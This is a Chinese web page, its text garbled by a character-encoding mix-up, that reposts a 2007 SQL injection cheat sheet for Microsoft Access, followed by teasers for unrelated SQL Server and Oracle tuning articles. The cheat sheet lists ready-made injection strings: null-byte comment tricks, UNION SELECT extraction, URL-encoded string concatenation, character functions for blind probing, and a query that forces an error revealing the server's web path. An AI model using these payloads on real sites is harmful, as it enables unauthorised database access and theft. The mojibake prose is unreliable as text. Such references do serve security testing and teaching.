Ò׽ؽØÍ¼Èí¼þ¡¢µ¥Îļþ¡¢Ãâ°²×°¡¢´¿ÂÌÉ«¡¢½ö160KB

ÕûÀí±È½ÏÈ«µÄAccess SQL×¢Èë²Î¿¼

 Access SQL×¢Èë²Î¿¼
°æ±¾ 0.2.1
(×î½ü¸üР10/10/2007)
Ô­×÷Õß²»Ïê
 
ÃèÊö SQL²éѯ¼°×¢ÊÍ
×¢ÊÍ·û AccessÖÐûÓÐרÃŵÄ×¢ÊÍ·ûºÅ.Òò´Ë"/*", "--"ºÍ"#"¶¼Ã»·¨Ê¹ÓÃ.µ«ÊÇ¿ÉÒÔʹÓÿÕ×Ö·û"NULL"(%00)´úÌæ:
' UNION SELECT 1,1,1 from validTableName%00
 
Óï·¨´íÎóÐÅÏ¢ "[Microsoft][Driver ODBC Microsoft Access]"
¶à¾äÖ´ÐÐ ²»Ö§³Ö.
ÁªºÏ²éѯ AccessÖ§³ÖÁªºÏ²éѯ,UNIONºóµÄfrom¹Ø¼ü×Ö±ØÐëʹÓÃÒ»¸öÒѾ­´æÔڵıíÃû.
¸½Êô²éѯ AccessÖ§³Ö¸½Êô²éѯ(ÀýÈç:"TOP 1"ÓÃÀ´·µ»ØµÚÒ»ÐеÄÄÚÈÝ) :
' AND (SELECT TOP 1 'someData' from validTableName)%00
 
LIMITÖ§³Ö LIMIT²»±»Ö§³Ö,µ«ÊÇÔÚ²éѯÖпÉÒÔÉùÃ÷"TOP N"À´ÏÞÖÆ·µ»ØÄÚÈݵÄÐÐÊý:
' UNION SELECT TOP 3 AttrName from validTableName%00 : ÕâÌõÓï¾ä·µ»Ø(ǰ)3 ÐÐ.
 
Èòéѯ·µ»Ø0ÐÐ Ôڽű¾ÔÚ·µ»ØµÄHTML½á¹ûÖÐÖ»ÏÔʾµÚÒ»¸ö²éѯµÄ½á¹ûµÄʱºò·Ç³£ÓÐÓÃ:
' AND 1=0 UNION SELECT AttrName1,AttrName2 from validTableName%00
 
×Ö·û´®Á¬½Ó ²»Ö§³ÖCONCAT()º¯Êý. ¿ÉÒÔʹÓÃ"&"»ò"+"²Ù×÷À´Á©½ÓÁ½¸ö×Ö·û´®.ÔÚʹÓõÄʱºî±ØÐë¶ÔÕâÁ½¸ö²Ù×÷·û½øÐÐURLencode±àÂë:
' UNION SELECT 'web' %2b 'app' from validTableName%00 : ·µ»Ø"webapp"
' UNION SELECT 'web' %26 'app' from validTableName%00 : ·µ»Ø"webapp"
 
×Ó×Ö·û´® MID()º¯Êý:
' UNION SELECT MID('abcd',1,1) from validTableName%00 : ·µ»Ø "a"
' UNION SELECT MID('abcd',2,1) from validTableName%00 : ·µ»Ø "b"
 
×Ö·û´®³¤¶È LEN()º¯Êý:
' UNION SELECT LEN('1234') from validTableName%00 : ·µ»Ø 4
 
±©WEB·¾¶ ¿ÉÒÔͨ¹ý¶ÔÒ»¸ö²»´æÔÚµÄ¿â½øÐÐSELECT²Ù×÷.Access½«»á»ØÓ¦Ò»Ìõ°üº¬ÓÐÍêÕû·¾¶µÄ´íÎóÐÅÏ¢.:
' UNION SELECT 1 from ThisIsAFakeName.FakeTable%00
 
È¡×Ö·ûµÄASCIIÖµ ASC()º¯Êý:
' UNION SELECT ASC('A') from ValidTable%00 :·µ»Ø65 ('A'µÄASCIIÖµ)
 
ASCIIֵת»»Îª×Ö·û CHR()º¯Êý:
' UNION SELECT CHR(65) from validTableName%00 : ·µ»Ø 'A'
 
IFÓï¾ä ¿ÉÒÔʹÓÃIIF()º¯Êý. Óï·¨ : IIF(condition, true, false) :
' UNION SELECT IIF(1=1, 'a', 'b') from validTableName%00 : ·µ»Ø 'a'
 
ʱ¼ä½Ó¿Ú ²»´æÔÚÀàËÆBENCHMARK()»òSLEEP()µÄº¯Êý,µ«ÊÇ¿ÉÒÔʹÓôóÁ¿(¸ß¸ºÔØ)µÄ²éѯÀ´´ïµ½Õâ¸öЧ¹û.µã»÷ÕâÀï²é¿´²Î¿¼.


Ïà¹ØÎĵµ£º

Sql server2005 ÓÅ»¯²éѯËÙ¶È50¸ö·½·¨Ð¡½á

 Sql server2005ÓÅ»¯²éѯËÙ¶È51·¨²éѯËÙ¶ÈÂýµÄÔ­ÒòºÜ¶à£¬³£¼ûÈçϼ¸ÖÖ£¬´ó¼Ò¿ÉÒԲο¼Ï¡£
I/OÍÌÍÂÁ¿Ð¡£¬ÐγÉÁËÆ¿¾±Ð§Ó¦¡£
¡¡¡¡Ã»Óд´½¨¼ÆËãÁе¼Ö²éѯ²»ÓÅ»¯¡£
¡¡¡¡ÄÚ´æ²»×ã¡£
¡¡¡¡ÍøÂçËÙ¶ÈÂý¡£
¡¡¡¡²éѯ³öµÄÊý¾ÝÁ¿¹ý´ó(¿ÉÒÔ²ÉÓöà´Î²éѯ£¬ÆäËûµÄ·½·¨½µµÍÊý¾ÝÁ¿)¡£
¡¡¡¡Ëø»òÕßËÀËø(ÕâÒ²ÊDzéѯÂý×î³£¼ûµÄÎÊÌ ......

ÔõÑù²ÅÄÜʵÏÖÅÅÐòÓÅ»¯µÄ²ã´Î¹ØÏµ±íÉè¼Æ_SQL¼¼ÇÉ

 Êý¾Ý²ã´ÎµÄ¸ÅÄî:
Êý¾Ý²ã´ÎÊDZí´ïÊý¾ÝµÄÒ»ÖÖÖØÒª¹ØÏµ£¬ÔÚÊý¾Ý¿âµÄÉè¼ÆÖУ¬È磺×éÖ¯½á¹¹·Ö½â¡¢¹¤×÷ÈÎÎñ·Ö½â¡¢ÐÐÕþÇø»®µÄ·Ö½âµÈ¶¼ÊDzã´Î¹ØÏµÊý¾ÝµÄµäÐÍʵÀý¡£
±í´ï²ã´Î¹ØÏµµÄÊý¾ÝÒ»°ãÐèҪʵÏÖÈçÏÂÊôÐÔ£º

 
1.²ã´ÎµÄ×î´ó¼¶Áª²ã´ÎÊý¡£È磺Öйú£­>ºþÄÏÊ¡->³¤É³ÊÐ->Óê»¨Çø£¬¾ÍÊÇ4²ã¡£
2.ÄÜ·´Ó³Í¬Ò»² ......

¶¯Ì¬SQL

Sample1:
/* Variable Declaration */
DECLARE @EmpID AS SMALLINT
DECLARE @SQLQuery AS NVARCHAR(500)
/* Build and Execute a Transact-SQL String with a single parameter value Using EXECUTE Command */
SET @EmpID = 1001
SET @SQLQuery = 'SELECT * from tblEmployees WHERE EmployeeID = ' + CAST(@EmpID A ......

ÕÒµ½ÒýÆð´ÅÅÌÅÅÐòµÄSQL

ÏÂÃæµÄÕâЩ½Å±¾¶¼¿ÉÒÔÕÒµ½ÒýÆð´ÅÅÌÅÅÐòµÄSQL¡£ 
SELECT /*+ rule */ DISTINCT a.SID, a.process, a.serial#,
TO_CHAR (a.logon_time, 'YYYYMMDD HH24:MI:SS') LOGON, a.osuser,TABLESPACE, b.sql_text
from v$session a, v$sql b, v$sort_usage c
WHERE a.sql_address = b.address AND a.saddr = c.session_addr; ......

SQL ÁÙʱ±íÓëÁÙʱ±äÁ¿±í

 
         ÔÚSQLServerµÄÐÔÄܵ÷ÓÅÖУ¬ÓÐÒ»¸ö²»¿É±ÈÄâµÄÎÊÌ⣺ÄǾÍÊÇÈçºÎÔÚÒ»¶ÎÐèÒª³¤Ê±¼äµÄ´úÂë»ò±»Æµ·±µ÷ÓõĴúÂëÖд¦ÀíÁÙʱÊý¾Ý¼¯?±í±äÁ¿ºÍÁÙʱ±íÊÇÁ½ÖÖÑ¡Ôñ¡£ÈçºÎÈ·¶¨Ê²Ã´Ê±ºòÓÃÁÙʱ±í£¬Ê²Ã´Ê±ºòÓñí±äÁ¿ÄØ£¿ÁÙʱ±íºÍ±í±äÁ¿¶¼ÓÐÌØ¶¨µÄÊÊÓû·¾³¡£
¡¡¡¡±í±äÁ¿
¡¡¡¡±äÁ¿¶ ......
© 2009 ej38.com All Rights Reserved. ¹ØÓÚE½¡ÍøÁªÏµÎÒÃÇ | Õ¾µãµØÍ¼ | ¸ÓICP±¸09004571ºÅ